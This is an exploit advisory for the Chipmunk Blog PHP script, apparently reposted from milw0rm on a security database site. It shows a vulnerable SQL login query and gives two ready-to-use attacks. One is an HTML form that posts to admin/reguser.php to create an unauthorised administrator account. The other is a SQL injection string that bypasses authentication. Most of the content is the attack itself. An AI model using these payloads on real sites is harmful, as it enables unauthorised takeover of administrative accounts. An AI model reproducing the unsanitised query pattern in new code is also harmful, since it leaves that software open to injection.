Chipmunk Blog (Auth Bypass) Add Admin Exploit

2009.02.05
Credit: x0r
Risk: High
Local: No
Remote: Yes
CWE: CWE-16

######################################################################################### [0x01] Informations: Script : Chipmunk Blog Download : http://www.chipmunk-scripts.com/blog/blog.zip Vulnerability : Add Admin Exploit\Auth Bypass Author : x0r Contact : x0r@live.it \ andry2000@hotmail.it Website : NULL ######################################################################################### [0x02] Bug: \admin\reguser.php \admin\authenticate.php if (isset($_POST['submit'])) // name of submit button { $username=$_POST['username']; $password=$_POST['password']; $password=md5($password); $getadmin="SELECT * from bl_admin where username='$username' and password='$password'"; $getadmin2=mysql_query($getadmin) or die("Could not get admin"); ######################################################################################### [0x03] Exploit: Add Admin: <html> <head> <title> Chipmunk Blog (reguser.php) Add Admin Exploit (html)</title> </head> <body> <form action=http://xxxxxxx/blog/admin/reguser.php method=post> Username:<br> <input type=text name='username' value='x0r' size="20"><br> Password:<br> <input type=text name='password' value='h4x0rz' size="20"><br> <input type="text" name="pass2" value='h4x0rz' size="15"><br> <input type=submit name='submit' value='submit'><br> </form> </body> </html> Exploit2: admin ' or ' 1=1-- #########################################################################################

References:

http://www.milw0rm.com/exploits/7894


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top